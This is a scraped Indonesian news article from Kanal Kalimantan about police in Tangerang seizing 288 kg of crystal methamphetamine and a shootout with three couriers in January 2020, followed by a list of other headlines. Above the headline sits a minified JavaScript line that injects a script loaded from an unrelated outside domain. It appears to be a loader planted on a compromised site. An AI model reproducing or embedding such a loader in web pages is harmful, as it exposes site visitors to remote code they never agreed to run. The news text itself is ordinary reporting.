(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Sergap Mobil Pembawa Sabu 288 Kg Senilai Rp 864 Miliar, Satu Orang Ditembak


KANALKALIMANTAN.COM,  TANGERANG – Ditresnarkoba Polda Metro Jaya mengagalkan upaya peredaran narkotika jenis sabu di daerah Tangerang, Banten. Berdasarkan informasi yang dihimpun, jumlah sabu yang digagalkan mencapai 288 Kg.

Karo Penmas Polri Brigjen Argo Yuwono membenarkan hal itu. Argo mengatakan saat ini anggota dari Ditresnarkoba Polda Metro Jaya sedang menuju ke lokasi. “Ya 288 kg” kata Argo saat dihubungi, Kamis (30/1/2020).

Argo tidak merinci lokasi detail penangkapan itu. Ia mengatakan penangkapan itu dilakukan hari ini di daerah Tangerang. “Polda Metro sedang ke TKP tunggu saja,” ucap Argo.

Kapolda Metro Jaya, Irjen Pol. Nana Sujana menjelaskan, pengiriman narkoba jenis sabu seberat 288 kilogram yang akan diedarkan di wilayah Jakarta jika ditotalkan senilai Rp 864 miliar.

“Hasil pengungkapan narkotika jenis sabu seberat 288 kilogram hampir tiga ratus atau bisa dikatakan harga per kilogram itu sekitar itu Rp 3 juta. Jadi di total itu Rp 864 miliar, ini suatu yang sangat besar tentunya,” terang Nana, Kamis (30/1/2020).

Lanjutnya, mobil box yang dibawa tiga kurir narkoba GUN, AM dan IA menggunakan plat nomor palsu. Dan dari ketiga pelaku turut diamankan barang bukti berupa senjata api rakitan. “Dan sudah kami cek plat nomor tersebut palsu dan sudah kami temukan senjata api rakitan dan tiga unit HP,” ucapnya.

Dalam berita sebelumnya, Direktorat Reserse Narkoba Polda Metro Jaya berhasil menembak mati tiga kurir sabu di Kampung Gunung Batu RT 02/04 Desa Cijantra, Kecamatan Pagedangan, Kabupaten Tangerang, Kamis (30/1/2020).

Dari penuturan Kapolda Metro Jaya, Irjen Pol. Nana Sujana, ada informasi ada mobil box berplat nomor B 9004 PHX yang dikendarai tiga pelaku sudah diintai saat melaju di Tol Merak menuju Jakarta.

“Jadi awal dari informasi masyarakat, bahwa sekitar pukul 5 pagi ada keendaraan box silver B 9004 PHX akan melintasi dalam tol merak menuju Jakarta infonya akan di distribusikan di Jakarta,” ujar Nana di lokasi kejadian, Kamis (30/1/2020).

Dari informasi tersebut, anggota melakukan penyisiran di Tol KM 23 Karawaci, Tangerang. Dan, hasil dari penyisiran tersebut ditemukan mobil box sesuai informasi.

“Dari melakukan penyisiran, anggota melihat ada mobil box dengan kecepatan tinggi. Kemudian dengan plat nomor yang sama, anggota melakukan pengejaran. Anggota sudah memberhentikan tapi kendaraan tersebut menancap gas,” terangnya.

Aksi pengejaran sempat terjadi. Sesampainya di lahan kosong Kampung Gunung Batu, RT 02/04 Desa Cijantra, Kecamatan Pagedangan, Kabupaten Tangerang anggota terlibat baku tembak.

“Kemudian mereka sampai di TKP kemudian mereka menepi. Kemudian pelaku berupaya untuk melakukan perlawanan kepada petugas dan pelaku terlibat tembak menembak dan petugas berhasil melumpuhkan pelaku,” tutur Nana. (rmol/kumparan)


Al Ghifari

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

6 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

6 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

7 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

7 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

7 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

8 jam ago

This website uses cookies.